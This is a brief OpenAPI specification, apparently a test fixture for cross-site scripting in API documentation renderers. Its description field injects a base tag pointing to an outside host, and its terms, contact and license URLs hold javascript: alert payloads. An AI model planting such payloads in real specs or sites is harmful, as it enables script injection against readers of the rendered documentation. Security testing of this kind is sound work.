openapi: 3.3.1
info:
  title: "xss test"
  description: "Gxss'></title><Base+Href=//X55.is>"
  termsOfService: "javascript:alert(document.domain)"
  contact:
    name: "xss test"
    email: "xss test"
    url: "javascript:alert(document.domain)"
  license:
    name: "xss test"
    url: "javascript:alert(document.domain);"
  version: "1.0"
paths: {}
